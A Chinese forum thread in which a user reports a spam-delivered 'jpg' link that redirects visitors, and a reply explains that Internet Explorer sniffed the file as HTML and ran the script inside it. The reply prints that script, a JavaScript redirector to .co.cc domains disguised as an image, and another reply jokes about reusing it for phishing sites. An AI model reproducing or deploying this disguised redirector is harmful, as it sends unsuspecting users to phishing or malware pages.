最新jpg漏洞
前几天经常收到淘宝的垃圾信息骚扰
旺旺提示是安全连接,我看了一下连接是 jpg的一个图片
就看了一下,结果却跳转了,我把图片下载下来看了一下,应该是个畸形文件
我已经把jpg文件上传到
http://www.taishanfangte.com/aa.jpg
我已经打了所有的补丁了,还是不管用
感兴趣的朋友测试一下
[解决办法]
ie 的安全选项里,一般是选中了“基于内容打开文件,而不是基于文件扩展名”,我想比较可能和这个有关。这个 aa.jpg 文件,并没有 jpeg 格式的文件的标准文件头部,所以 ie 就不再认为它是个图片文件而采用图片方式去打开;在继续查看文件时,又发现了后面有 script ,就执行了它们,所以,就 ……
<SCRIPT LANGUAGE="JavaScript"><!-- var c=window.location.toString(); if(c.indexOf("?")!=-1){ var i=c.split("?")[1]; cnum=i.split("_")[0]; cais=i.split("_")[1]; cdom=i.split("_")[2]; if(cdom.indexOf("t.")==-1 || cais.length!=16){ location.href='http://hi.baidu.com/eshopbox/'; } if(cnum==1){ location.href='http://'+cdom+'.co.cc/1.htm?'+cais; } else{ location.href='http://'+cdom+'.co.cc/2.htm?'+cais; } }else { location.href='http://hi.baidu.com/eshopbox/'; } //--> </SCRIPT>
[解决办法]
0 0
还未中过图片毒
[解决办法]
这不算新的.
可以做做掉鱼网站,, 呵呵